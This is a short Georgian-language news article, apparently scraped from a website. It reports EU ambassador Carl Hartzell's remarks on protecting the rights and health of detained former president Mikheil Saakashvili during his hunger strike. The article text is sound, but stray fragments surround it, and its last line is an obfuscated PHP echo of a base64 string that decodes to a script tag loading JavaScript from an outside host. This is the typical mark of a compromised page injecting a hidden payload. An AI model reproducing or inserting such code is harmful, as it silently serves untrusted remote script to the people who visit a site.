celsiusi
ავერსი შნაიდერი
ევროკავშირის ელჩი საქართველოში კარლ ჰარცელი პატიმრობაში მყოფი მიხეილ სააკაშვილის საქმის კომენტირებისას დასძენს, რომ მისი, როგორც პატიმრის უფლებები სრულად უნდა იყოს დაცული. აღნიშნულის შესახებ ელჩმა 28 ოქტომბერს, ჟურნალისტებთან ისაუბრა.
 
“ცნობილია, რომ ძალიან ახლოდან ვაკვირდებით მესამე პრეზიდენტის საქმეს. საკვანძო საკითხად რჩება სწორად მოქმედება, ხოლო სწორად მოქმედება არის დარწმუნება იმაში, რომ სრულადაა დაცული მისი, როგორც პატიმრის ყველა ფუნდამენტური უფლება. ეს მოიცავს მის ჯანმრთელობას.
 
არსებობენ ძალიან კარგი, ავტორიტეტული ორგანოები, რომლებიც თვალს ადევნებენ მის საქმეს, მაგალითად ექიმთა კონსილიუმი და სახალხო დამცველი, რომელსაც გააჩნია სპეციალური მანდატი ამ საქმესთან დაკავშირებით. ჩემი რჩევაა მათი რეკომენდაციების გათვალისწინება”, — დასძენს ჰარცელი.
 
მიხეილ სააკაშვილი საქართველოში პირველ ოქტომბერს დააკავეს. ის 28-ე დღეა, პროტესტის ნიშნად შიმშილობს და უარს აცხადებს, საჭიროების შემთხვევაში, ციხის საავადმყოფოში გადაყვანაზე. სააკაშვილი მიიჩნევს, რომ მას აღნიშნულ დაწესებულებაში საფრთხე დაემუქრება.
თავის მხრივ, საქართველოს სახალხო დამცველმა განაცხადა, რომ ციხის საავადმყოფო არ შეესაბამება სააკაშვილის ჯანმრთელობასთან დაკავშირებით ექიმთა კონსილიუმის მიერ შემუშავებულ რეკომენდაციებს.
 
აღნიშნულს არ ეთანხმება ხელისუფლება, რომელიც ფიქრობს, რომ სააკაშვილის მკურნალობისთვის ყველა საჭირო პირობაა შექმნილი სპეციალური პენიტენციური სამსახურის მე-18 სამკურნალო დაწესებულებაში.
914
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");